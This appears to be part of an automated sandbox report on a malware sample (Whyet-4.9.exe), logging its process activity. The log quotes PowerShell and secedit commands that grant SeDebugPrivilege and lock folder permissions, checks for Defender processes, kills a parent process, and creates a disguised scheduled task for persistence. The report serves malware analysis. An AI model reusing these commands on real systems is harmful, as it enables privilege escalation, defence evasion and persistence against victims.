Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Whyet-4.9.exe	Code function: 0_2_00007FF676FA3240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF676FA3240
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Code function: 0_2_00007FF676FA2680 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF676FA2680
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Code function: 0_2_00007FF676FA42FC SetUnhandledExceptionFilter,	0_2_00007FF676FA42FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001E0D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_000000018001E0D0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002BB84 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_000000018002BB84
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003A484 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000000018003A484
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_0057A8ED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_0057A8ED
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_00576340 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_00576340
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D7D0C2 SetUnhandledExceptionFilter,	32_2_04D7D0C2
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D7D0B0 SetUnhandledExceptionFilter,	32_2_04D7D0B0

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe

32_2_04D73C8E

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D74652 GetModuleFileNameA,ShellExecuteExA,ExitProcess,

32_2_04D74652

Source: C:\Users\user\Desktop\Whyet-4.9.exe	Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5655410 "__IRAFN:C:\Users\user\Desktop\Whyet-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=5800').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
